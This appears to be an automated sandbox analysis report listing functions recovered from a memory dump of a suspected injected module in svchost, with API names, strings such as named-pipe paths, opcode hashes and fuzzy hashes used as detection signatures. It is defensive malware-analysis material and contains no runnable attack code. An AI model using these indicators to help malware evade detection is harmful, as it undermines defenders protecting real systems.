                                                                                control_flow_graph 611 1f28c93a544-1f28c93a5ac call 1f28c93b414 614 1f28c93aa13-1f28c93aa1b call 1f28c93c748 611->614 615 1f28c93a5b2-1f28c93a5b5 611->615 615->614 616 1f28c93a5bb-1f28c93a5c1 615->616 618 1f28c93a5c7-1f28c93a5cb 616->618 619 1f28c93a690-1f28c93a6a2 616->619 618->619 623 1f28c93a5d1-1f28c93a5dc 618->623 621 1f28c93a963-1f28c93a967 619->621 622 1f28c93a6a8-1f28c93a6ac 619->622 626 1f28c93a969-1f28c93a970 621->626 627 1f28c93a9a0-1f28c93a9aa call 1f28c939634 621->627 622->621 624 1f28c93a6b2-1f28c93a6bd 622->624 623->619 625 1f28c93a5e2-1f28c93a5e7 623->625 624->621 630 1f28c93a6c3-1f28c93a6ca 624->630 625->619 631 1f28c93a5ed-1f28c93a5f7 call 1f28c939634 625->631 626->614 628 1f28c93a976-1f28c93a99b call 1f28c93aa1c 626->628 627->614 637 1f28c93a9ac-1f28c93a9cb call 1f28c937940 627->637 628->627 634 1f28c93a894-1f28c93a8a0 630->634 635 1f28c93a6d0-1f28c93a707 call 1f28c939a10 630->635 631->637 645 1f28c93a5fd-1f28c93a628 call 1f28c939634 * 2 call 1f28c939d24 631->645 634->627 638 1f28c93a8a6-1f28c93a8aa 634->638 635->634 649 1f28c93a70d-1f28c93a715 635->649 642 1f28c93a8ac-1f28c93a8b8 call 1f28c939ce4 638->642 643 1f28c93a8ba-1f28c93a8c2 638->643 642->643 658 1f28c93a8db-1f28c93a8e3 642->658 643->627 648 1f28c93a8c8-1f28c93a8d5 call 1f28c9398b4 643->648 679 1f28c93a648-1f28c93a652 call 1f28c939634 645->679 680 1f28c93a62a-1f28c93a62e 645->680 648->627 648->658 654 1f28c93a719-1f28c93a74b 649->654 655 1f28c93a887-1f28c93a88e 654->655 656 1f28c93a751-1f28c93a75c 654->656 655->634 655->654 656->655 660 1f28c93a762-1f28c93a77b 656->660 661 1f28c93a8e9-1f28c93a8ed 658->661 662 1f28c93a9f6-1f28c93aa12 call 1f28c939634 * 2 call 1f28c93c6a8 658->662 664 1f28c93a874-1f28c93a879 660->664 665 1f28c93a781-1f28c93a7c6 call 1f28c939cf8 * 2 660->665 666 1f28c93a900 661->666 667 1f28c93a8ef-1f28c93a8fe call 1f28c939ce4 661->667 662->614 670 1f28c93a884 664->670 692 1f28c93a804-1f28c93a80a 665->692 693 1f28c93a7c8-1f28c93a7ee call 1f28c939cf8 call 1f28c93ac38 665->693 675 1f28c93a903-1f28c93a90d call 1f28c93b4ac 666->675 667->675 670->655 675->627 690 1f28c93a913-1f28c93a961 call 1f28c939944 call 1f28c939b50 675->690 679->619 696 1f28c93a654-1f28c93a674 call 1f28c939634 * 2 call 1f28c93b4ac 679->696 680->679 684 1f28c93a630-1f28c93a63b 680->684 684->679 689 1f28c93a63d-1f28c93a642 684->689 689->614 689->679 690->627 700 1f28c93a80c-1f28c93a810 692->700 701 1f28c93a87b 692->701 712 1f28c93a815-1f28c93a872 call 1f28c93a470 693->712 713 1f28c93a7f0-1f28c93a802 693->713 717 1f28c93a676-1f28c93a680 call 1f28c93b59c 696->717 718 1f28c93a68b 696->718 700->665 702 1f28c93a880 701->702 702->670 712->702 713->692 713->693 721 1f28c93a686-1f28c93a9ef call 1f28c9392ac call 1f28c93aff4 call 1f28c9394a0 717->721 722 1f28c93a9f0-1f28c93a9f5 call 1f28c93c6a8 717->722 718->619 721->722 722->662
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: e40025dd339e04ccce31ab42e6e43acdbfcb282d0efd4a44ebad16c513d6860d
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 51E17A72640B828AEB209BB598803FD77E0F755BE8F196166EE8957B99CF34C481C701
                                                                                Function 000001F28C93F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 13c93742e32ee18173703abb3e1a129c63d5b1ec7d71d03a5c5f3c659c718adc
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: 1E41AF72391E82D1EB16CB76A9087F623D1FB49BE0F0962B9DD0A87785EF39C4458314
                                                                                Function 000001F28C93104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: e61549d0980b68c844d3942048ca76a1816c2b656e0948ec105a341f4de0e688
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: 2D412A72254FC5CAE760CF61E4447EA77E1F389B99F448129DA8907B58EF38C589CB40
                                                                                Function 000001F28C93D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001F28C93C7DE,?,?,?,?,?,?,?,?,000001F28C93CF9D,?,?,00000001), ref: 000001F28C93D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 5dc8ff007fbd2db76a624d83063225198278ec11a387f4125d1c2f12366c8b68
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: D2119332794EC782FA68973565613FA62C95B44BF4F1C63F4E839076EADF38C4028200
                                                                                Function 000001F28C937510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: 9b580adf4509b41eb4a94773ff5a8102b7ce542dff54e5b26089740a9ad9f4c5
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: ED81F771780EC386FB54AB35AA513F922D1AB85BCCF1CA4F5E90987796EB38C845C710
                                                                                Function 000001F28C939DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: 03f29b56315fbdb1e2c5d3331ac812390df4fb0cbb8384e9f5da931591f2930e
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: 9D31A232292E82E1EE219B62A4007F523D4B748BE0F5E6675DD2E0B7D0EF39C5858310
                                                                                Function 000001F28C943DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 67fdd3f2f8992466b5831d267c2879e71773b428b435bf4b694825e767cf1671
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 69115B71250E82C6E7508B52E8547B966E0F788FE5F448264EA5E87794DB38C9148740
                                                                                Function 000001F28C933790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 9fd3b5cfc8d5e8966b9d3604d7804b60c4d561f4ad314e44b91f313a0dd5a99b
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: BB112A7A745B82C2EB149B22E4082B962A0F748BD5F4841B9DE8D07B54EF3DC545C704
                                                                                Function 000001F28C935B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 47c5c9812b7ca215d1726492dddbe4c416650bb443fc8a163cb96cfe57a725b8
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: B7D17876248F8981DB709B1AE4943BA77E0F38CBC8F151166EA8D47BA9DF38C551CB00
                                                                                Function 000001F28C932F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: b9cea8a45f337747782123fe34ee0897264f1dc14d1d7790dfee48e93a4f475a
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: FF316C36781F96C2EA55DF26E9407BA67E0FB48BC4F089174DE4847B66EF38C4A18700
                                                                                Function 000001F28C93CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: 418adbff46a5a50f38b0b253e874f0d0017697ca07832169e1c80a98fc2d9935
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: A8119D31394EC2C2FA24A73169557FA22D66B88BF4F1863B4E836477DAEF3984018600
                                                                                Function 000001F28C93199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 1a6447b746ba72951b106e25e3206bcaab34f772bbf3986eefe84e7ef40a23b2
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: 5A012D71344E8282EB64DB62A4587B963E5F788BC5F488075DE4983765DF3CC549C740
                                                                                Function 000001F28C9336C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: efc9dd88066c2b846a4813f200c66da5525754cb4ea5464905f9a4518e267477
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 690129B5291F82C2FB249B22E8183B963E0BB49BC6F0844B8CD4E07765EF3DC1488700
                                                                                Function 000001F28C938FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: f9eb285e1d34bcdb7ed76620ca0307c61ee7c6b0458fb15f7398ffc743cad808
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: A451DF32345A828AEB14CF65E848BB977E6F344BC8F1A91B4DE0653788DB75CA81C700
                                                                                Function 000001F28C931A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: efef17bbaea8c09d0e74b7a2858e95e013f6fcdb200dc7db2845cff4b926692d
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 71F04F72344EC292EB608F21F8847B967A1F748BC9F889070DA4987964DF3CC68DCB00
                                                                                Function 000001F28C933044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 148976000f075657713aaae28a70d927c58dd9bf1c24965bf8e6e3b71b7eca3c
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: CBF01275754FC682EA148B53B9141B966A6BB48FD0F08D1B4EE5A47B18DF3CC4458700
                                                                                Function 000001F28C93BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: fc48c038c58eca095657e722b28af341116bf169d467f81dd0427d00468570f8
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 90F090B1351F8681EB208B29E8443F963A1FB89BE1F5456B9CA6A472E4DF3CC048C340
                                                                                Function 000001F28C9350D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction ID: 695498e749fc0dccb61c5851ea1446fca79afe24a4ea5175a6ebc953a781018c
                                                                                • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction Fuzzy Hash: FE02B536259BC586EB60CB65E4943BAB7E1F3C8794F145065FA8E87BA8DB7CC444CB00
                                                                                Function 000001F28C935710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction ID: af79dd3a637af7051ac8258955ba177530c52f0ebe9781b5e5262fa2f630485f
                                                                                • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction Fuzzy Hash: 9B61B736559E86C6E760CB25E4443BAB7E0F388BC4F5421A5FA8E47BA8DB7CC540CB00
                                                                                Function 000001F28C1E3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: a4a41e1020a2a8b071d84c40f44e8a003d1d22f86d765e777ed5b7e6a37d2a97
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 101191B2AD0F1391FA641528E4C13F91BC16F593F4FC88639E966C73D68BB4C841C200
                                                                                Function 000001F28C944104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 18dd3864b1be54540109cc27050939df0162b2e3d2136eb0ccd191d63ff6d6f5
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 4B117032AD0ED3A2F6685568E8563F911C16B7C3F8F18C6F4E976077E6CB38CA416201
                                                                                Function 000001F28C939650 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                                • Instruction ID: 7bb4e64f612b34c83592e40eb8d5e89f9ecd63dea6d765824e11e06b7d663cc9
                                                                                • Opcode Fuzzy Hash: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                                • Instruction Fuzzy Hash: 26116030786EC382FF549735A8843F922D5AB487E4F0D66B4D926077D9EB38C841C700
                                                                                Function 000001F28C1DF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3317699689.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 8ad1ea8264d7c37166e6a84d5d136f736317519dcbce977c15a2e7b39df90729
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 1B61C1766A0E4242FA699B69E5C43FE6EE1E7867C0F544539DB0B077A4DB34FA42C300
                                                                                Function 000001F28C93AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
